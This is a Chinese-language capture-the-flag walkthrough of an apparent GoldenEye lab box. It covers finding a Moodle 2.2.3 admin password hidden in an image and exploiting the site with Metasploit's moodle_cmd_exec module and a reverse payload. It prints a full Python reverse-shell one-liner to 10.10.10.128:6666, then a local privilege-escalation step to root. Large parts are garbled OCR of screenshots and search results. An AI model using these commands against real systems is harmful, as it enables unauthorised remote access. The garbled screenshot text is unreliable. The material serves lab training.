20.发现了版本2.2.3的cms。
21.发现了一个敏感文件。
22.发现了目录
23访问一下看看。使用wget下载到本地,wget http://severnaya-station.com/dir007key/for-007.jpg
24.使用binwalk(路由逆向分析工具)、exiftool(图虫)、strings(识别动态库版本指令)等查看图片。
25.发现base64加密。
26.解密。xWinter1995x!
27.使用admin/xWinter1995x! 登录。
2.2.3:Administration:Se.
KaliLinuxRevealediMa..
09:28
上午
<s3cret.txt>
2.2.3:Administation:SeverEnvIronmentMozillaFirefox
2.2.3:AdministrationSeX
severnaya-station.com/gnocertdirladmin/enironment.
三
业你印
Updatecomponent
Environment
Home
Myhome
Sitepages
Checkhowydurserversuiscurentandfuureinstalaionrguirements
Myprotile
2.2.3(Bulld:20120514)
Moodleversidh
Courses
Serverchecks
ED
Adminbookmarks
lnformationReport
bookmmarkthispage
Status
Check
shoudbeinstalledandenabledforbestresults
xmlrpc
口
Settings
ieamlRcetciomkneeh
Check
ad
Myprofilesettings
shoudbeinstalledandenabledforbestresults
ocAtmMAGLmLLoGBAm
Siteadministration
Notifications
通
Check
int
phpextension
shouldbeinstalledandenabledforbestresults
鱼
Registraton
mextcnionisudiomo
3Advancedfeatures
意启普意意业业电电活活
moodle
version1.9isrequiredandyouarennning2.2.
Users
mustbeinstalledandenabled
Courses
postgres
versilon8.3equiredandyounning322
Grades
version5.3.2isrequiredandyoureunning55.91.4.2
Location
php
Language
php_extension
mustbeinstalledandenabled
Plugins
mbstring
shouldbeinstalledandenabledforbestresults
phpextension
Secunty
cur
musibelnstalledandenabled
Appearance
shouldbeinstalledandenablcdforbestresults
phpextension
Frontpage
tokenizet
php_extension
shouldbeinstalledandenabledforbestresults
Server
shouldbeinstalledandenabledforbestresults
SoaP
phpextension
竖盗洲图
Systempaths
ctype
phpextenslon
supportcontact
mustbeinstalledandenabled
Sessionhandling
phpextension
Zip
mustbeinstallcdandenablcd
HTTP
Slmplexml
mustbeinstalledandenabled
Maintenancemode
mustbeinstalledandenabled
Spl
Cleanup
pcre
mustbeinstalledandenabled
Environment
dom
mustbeinstalledandenabled
PHPinTo
docsmoodeorq/22/en/admin/environetphpextenon/x
m
尿指针移入其中或按Ctrl+G.
28.浏览器搜索历史漏洞。
oftBing
Moodle2.2.3漏洞
可典
地图
网页
学术
视须
图片
在新选项卡中打开链接
时间不限
3,050,000.000条结果
相关搜索
国家信息安全漏洞库
www.CVdg.cwB/xxKIxqBYIdNDN242
https202.117.15.60moodle
2012920Mo澳大多MDougam)博开发的,开的电子
10.1.15.232moodle
软件平台,也称课程管理系统,学习管理系统北拟学习环算.Mood225之前的22本232之
nwthmoodle
前的23x版季中的eposioylepsoy..远认用可利用该属通过mXbVe
字段中的-1值,绕过预期上传大小的限制..
ualmoodle
gdmoodle
MoodleSpellcheck远程命令执行漏洞
moodlenottingham
htps:/lwww.netentsec.com/supportyshow-loopholeugrade.
moodlephp
20131030.Mood是个课程管理系统(CMS),也被叫做学习管理系统(MS)或拟学习环境
moodletum
VE,Mo223.25上存在远程命全执行漏洞,远程攻击者可利用此湿减在受影应用
上下文中执行任意命令
Moodle文件系统未授权访问漏洞(CVE-2013-4524)
Linux
https://www.linuxidc.com/Linux/2013-11/93249.htm
20131125Mod是个课程管理系统(CMS),也慢学习管理系统(MS)或拟学习环境
MEModL25252.2424623板的文件系统件存在未授仪漏洞,攻
击者可利用比泻洞获取未授没读权限,并取教信息..来源:FAodACNCMassat,链
接:http://secunia.com/advsones/55835..建议..
Moodle远程代码执行漏洞-简书-jianshu.com
https://wwwjianshu.com/p/5fb98fc36012
20174.26受该漏洞影响的版本32到321,3.1至314,30到0.827.0到
2.7.18和其他不受支持的版本,技术细节一,太多代码的患Moodle的系统极为庞大,
包含数千个文件,数百个不同的组件,和约200万行的PHP代码
CVE-2020-1754Moodle安全漏洞-漏洞情报,漏洞详情...
https://www.anguanke.comivulid/1964182
20203.17Mod是免费,开的电子学习件平台,也程理统,学管理统拟学
环境.Moode中存在安全流洞,攻击者可利用漏洞置看其他组用的,,以下品及版本受
到:Moode38本至38.1本,37至314本3至36本,3版本至35.10本及
之前不再支持的版本.
Moodle2.2.3漏洞的视频
bing.comivideos
4:12
0:42
LeamingMoodle3.9
InstallMoodle30in2
Moodle2Coniqurar
automatiiculacionenMoo...
Minutes
已览58次2月16.2016
4.7K次观看
已次览3次1月21,2015
ViMeO,DrNellleDeutsch
ViMeOJoseMandeJuan.
Lynda.com-tromLinkedln
二、渗透
1.使用msf,查找历史漏洞。
metasploit
octelocalhost/share/wordlists/metasploit]
msfconsole
开开开节
cO:
cacao'caco
accao
,aa
gacqcaaaacaca
ecacoooooocco
QqoqoccoccocD
cccccoooooco
Yco
?
网acocco
CCOCO
ca
caao
cQ
cO
口
Metasploit!
3C
口
metasploity6.0.15-dey
2071exploits1123auxitiary352post
592payloads-45encoders.10nops
evasion
etasploittip:Viewadvancedmtithdce
searchmoodle
atchingModules
DisclosureDateRankCheck
Description
Name
RenoteCommandExecution
2013-10-30
0
Moodte
No
exploit/multi/http/moodle.cmd_exec2
good
modlebyhseorthdex.ormlenuoute
nteractwith
sf6>use日
2.设置payload。
eor
InteractwithamodulebynameorindeXoe
Pexample
msf6>use日
msf6exploit(multi/http/moodecme
admin
setusername
admin
usernamee>a
msf6exploit(multi/http/moodecde
setpasswordxlinter1995x!
exec)
passworde_xwinter1995x!
setrhostssevernaya-station.com
sf6exploit(multi/http/moodecd
exec
rhostse_severnaya-station.com
targeturi/gnocertdir
msf6exploit(multi/http/moodlecdexe)
set
targeturie_/gnocertdir
set
cmd/unixreverse
payload
msf6exploit(multi/http/moodlecdex
payloadeocmd/unixreverse
thost10.10.10.128
set
msf6exploit(multi/http/moodle
cmd
exec
thoste210.10.10.128
msf6exploit(multi/http/mooec
show
options
exec
Module
eoptions(exploit/mutihttp/oodecex)
Currentsetting
Name
Reguired
Description
Passwordtoauthenticatewith
PASSWORD
xWinter1995x!
yes
Aproxychainoffomattype:host:portLtype:host:ot.
Proxies
n0
Thetargethostls),angecdtiferhstithxlath
RHOSTS
ves
severnaya-station.com
Thetargetport(TcP)
RPORT
80
yes
SESSKEY
Thesessionkeyoftheusertoimpersonate
no
false
NegotiateSL/iLsforoutgoingconection
SSL
n0
TARGETURI
TheURIoftheMoodleinstaltation
gnocertdir
yes
Usernametoauthenticatewith
USERNAME
yes
admin
HTTPservervirtualhost
VHOST
n0
Payloadoptions(cmd/unix/reverse):
Required
Name
currentsetting
Description
Thelistenaddress(aninterfacemaybespecified)
10.10.10.128
LHOST
yes
LPORT
4444
Thelistenport
yes
Exploittarget:
Id
Name
日
Automatic
3.更改编译环境。
2.2.3:Administration:Plux
中
合
severnaya-station.com/gnocertdirladmin/setting.
YouareloggedinasAdmnUsct(Lagou
GoldenEyeOperatorsTraining-Moodle
HoMeSleadminlstaonPlugnxMH
Blocksedluingon
口加
Navigation
Changessaved
Home
TinyMCEHTMLeditor
Myhome
Sitepages
Myprofile
Spellengine
PSpellshell
DetaultGoogleSpell
Courses
cdtortimhhoelopohongmo
Adminbookmarks
Spelljanguagelist
+English-en,Danish-da,Dutch-nl.Finnish-l
Default:
bookmarkthispage
editorunymce
CelFpallanguagest
DDIDdFLFmSe
可
Settings
Myproflesettings
Savechanges
Siteadministration
轻国
Notifications
Registration
Adivancedfeatures
Users
Courses
Grades
Location
Language
Plugins
Pluginsoverview
Activitymodules
Blocks
Messageoutputs
Authentication
Enrolments
-0.LL店
针移入其中可茶Cur.+G,.
4.使用python脚本提权。
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.10.128”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
in2.2.3:Administration:SeX
口
业
m
severnaya-station.comlgocertdiadmin/ettingtine
YouarelogdedindsAdminUserLogou
GoldenEyeOperatorsTraining-Moodle
HomeSiteadministrationServer?Systempaths
Blockseditingon
E山
Navigation
Systempaths
Home
Myhome
Sitepages
GDverslon
GD2xisinstalledC
DefaultGDsnotinstalled
gowosion
Myprotle
awwgwatmgcommm
Courses
youredoing-
Adminbookmarks
Pathtodu
bookmarkthispage
DetaultEmply
husr/bin/du
poutoupowemiomm.
ED
Settings
Myproflesettings
Pathtoaspell
shcsleep4062elhet192168
DefaultEmpty
Siteadministration
围Notifications
好可期店店
4F
Registration
bhayonUnwLnkysemy
具
Advancedfeatures
Users
Courses
Pathtodot
Delault:Emply
pathtodol
Grades
PoinouBotwgomm
Noetia.oos
Language
Plugins
Security
Appearance
Frontpage
Savechanges
Server
角Systempaths
Supportcontact
5.kali使用nc监听6666端口
三、提权
1.下载提权脚本。
2.进入文件目录。
3.开启远程文件传输
44
total
2018
rootroot4096Apr29
3
dnwx-
drwxr-xr-x22rootroot4096Apr242018
lrootroot19May32018
.bashhistory
lrootroot3106Feb192014
bashrc
rootroot4096Apr282018
2r
dnwx-...
cache
flag.txt
rootroot144Apr292018
WW-......
140Feb19
2014
nw-r--r..
1rootroot
romite
2018
rnd
rootroot1024Apr23
1[
rootroot8296Apr29
2018
Viminfo
#catfam
catfaH
cat:f:Nosuchfileordirectory
#catftag.txt
catflag.txt
cat:flag.txt:Nosuchfileordirectory
#ca
ca
sh:9:ca:notfound
#cat'ftaq.rh
catfltag.rh
cat:.ftag.iNosuchfileordirectory
#cat.ttag.txt
catftag.txt
ALeCtoldmetoptacethecodeshere:
568628e0d993b1973adc718237da6e93
Ifyoucapturedthismakesuretogohere.
/006-final/xvf7-ftag
4.然后在目标机器传输脚本
5.将gcc编译改为cc编译。
6.使用chmod+x权限
使用./exp提权
7.提权成功,然后访问root目录,查看flag。
总结
希望这篇文章可以帮助到你,我也是初学者,希望会的大佬勿喷,如果有错误的地方请指出来,我一定虚心改正。如果有好的方法,大家可以分享出来,多多交流。